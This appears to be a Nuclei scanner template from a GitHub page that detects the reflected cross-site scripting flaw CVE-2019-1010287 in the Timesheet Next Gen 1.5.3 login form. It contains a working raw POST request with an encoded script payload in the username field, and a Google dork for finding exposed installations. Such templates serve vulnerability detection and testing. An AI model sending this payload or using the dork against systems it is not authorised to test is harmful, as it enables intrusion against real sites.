-
Notifications
You must be signed in to change notification settings - Fork 222
/
CVE-2019-1010287.yaml
38 lines (33 loc) · 1.26 KB
/
CVE-2019-1010287.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
id: CVE-2019-1010287
info:
name: Timesheet 1.5.3 - Cross Site Scripting
author: pikpikcu
severity: medium
description: "Timesheet Next Gen 1.5.3 and earlier is affected by: Cross Site Scripting (XSS). The impact is: Allows an attacker to execute arbitrary HTML and JavaScript code via a \"redirect\" parameter. The component is: Web login form: login.php, lines 40 and 54. The attack vector is: reflected XSS, victim may click the malicious url."
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2019-1010287
- http://www.mdh-tz.info/ # demo
tags: cve,cve2019,timesheet,xss
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2019-1010287
cwe-id: CWE-79
metadata:
google-dork: inurl:"/timesheet/login.php"
requests:
- raw:
- |
POST /timesheet/login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username=%27%22%3E%3Cscript%3Ejavascript%3Aalert%28document.domain%29%3C%2Fscript%3E&password=pd&submit=Login
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- '><script>javascript:alert(document.domain)</script>'
part: body